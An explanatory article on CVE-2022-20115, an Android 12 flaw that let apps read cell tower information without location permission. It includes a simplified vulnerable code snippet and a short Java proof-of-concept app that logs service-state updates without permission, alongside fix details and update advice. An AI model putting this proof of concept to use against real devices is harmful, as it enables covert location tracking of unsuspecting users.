---
Overview
In 2022, security researchers uncovered a vulnerability in the Android operating system that potentially allowed malicious apps to access base station information—like cell tower IDs related to your phone—without needing the normally required location permissions. This vulnerability, tracked as CVE-2022-20115, highlights a significant oversight in how Android manages sensitive telephony data, and it's important for both users and developers to understand how it happened and what was at risk.
This article will break down what exactly happened with this bug, provide technical details and code snippets, and examine how attackers could take advantage of the oversight.
Affected Products: Android 12, Android 12L
- Component: TelephonyRegistry.java (frameworks/base/telephony/java/android/telephony/TelephonyRegistry.java)
Issue: Missing permission check in broadcastServiceStateChanged
- Potential Impact: Applications without location permission could still access information about the connected cellular base station.
Background: Telephony Information and User Privacy
Typically, access to sensitive cellular information—such as Base Station Identity Code (BSIC) and Cell ID—requires apps to request and be granted location permissions, since these can indirectly reveal a device’s physical location. Android’s TelephonyRegistry class acts as a bridge, transmitting changes in the telephony system to registered listeners, but it needs to carefully control which apps get this info.
How Does the Vulnerability Work?
The vulnerable method is broadcastServiceStateChanged. This method is supposed to notify registered listeners (including third-party apps) about changes to the cellular service state, such as connecting to a new tower. However, it was discovered that it failed to properly enforce permission checks on what apps could receive these notices—even though the transition to a new tower is sensitive information.
Key Point: _Apps could register for events and get access to base station info without having the right permissions._
App registers a PhoneStateListener for service state changes.
2. System keeps track of listeners and, when the base station changes, calls broadcastServiceStateChanged.
3. This method sends the info to all listeners—without checking if location permission is granted.
4. An app without ACCESS_FINE_LOCATION or ACCESS_COARSE_LOCATION permissions receives cellular data that it shouldn’t.
Code Snippet: Vulnerable Section (Simplified)
Here's a simplified example, extracted from Android 12’s TelephonyRegistry.java (for demonstration):
// TelephonyRegistry.java (snippet)
public void broadcastServiceStateChanged(ServiceState state, int subId, int phoneId) {
...
for (Record r : mRecords) {
// --- The missing permission check here ---
try {
r.callback.onServiceStateChanged(state);
} catch (RemoteException ex) {
// Handle error
}
}
}
What’s Missing?
Before delivering the update, a check like
if (!hasLocationPermission(r.pkgName, r.uid)) {
continue; // Skip this listener, no permission
}
...should have protected this info.
Proof-of-Concept: Exploiting The Flaw
Here’s a simple sketch of how a malicious app could snoop on base station changes without location permissions:
// Malicious app does NOT declare ACCESS_FINE_LOCATION or COARSE_LOCATION
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
TelephonyManager tm = (TelephonyManager) getSystemService(Context.TELEPHONY_SERVICE);
tm.listen(new PhoneStateListener() {
@Override
public void onServiceStateChanged(ServiceState serviceState) {
super.onServiceStateChanged(serviceState);
// This will print base station info!
Log.d("POC", "Got service state: " + serviceState.toString());
}
}, PhoneStateListener.LISTEN_SERVICE_STATE);
}
}
Even though this app doesn’t ask for any location permissions, it can still get updates whenever your phone switches cells, which essentially exposes your movement patterns.
Why Does This Matter?
- Location Tracking: By collecting cell tower change info and comparing it to public databases, apps could geolocate users without explicit consent.
- User Privacy Violation: As users, we expect apps to request permission before accessing location-derivable information. This flaw broke that contract.
How Was It Fixed?
After the bug was reported (Android ID: A-210118427), Google’s Android team updated the TelephonyRegistry code to ensure permission checks are strictly enforced in Android 13 and security patch levels for Android 12.
References to the Fix
- AOSP Commit: Add location check before sending base station info
- Android Security Bulletin June 2022
Original References
- Google Issue Tracker A-210118427 (May require login)
- CVE-2022-20115 at NVD
- Android Security Release Notes
How to Stay Protected
- Update Your Devices: Always install the latest Android security updates as soon as they're available.
- Be Cautious About Permissions: Even if an app doesn’t request location access, that doesn’t mean it can’t gather clues—especially on older, unpatched devices.
Conclusion
CVE-2022-20115 is a wakeup call on how complex cross-permission systems are in mobile OSs like Android. It’s easy to assume that location-linked info is always guarded by permission checks, but sometimes these checks are incomplete. The fix was straightforward but critical.
If you’re a developer, takeaway is simple: Always check for relevant permissions, even for less-obvious data sources.
*Written exclusively for you, with a focus on simplicity and accuracy.*
Timeline
Published on: 05/10/2022 20:15:00 UTC
Last modified on: 05/16/2022 15:31:00 UTC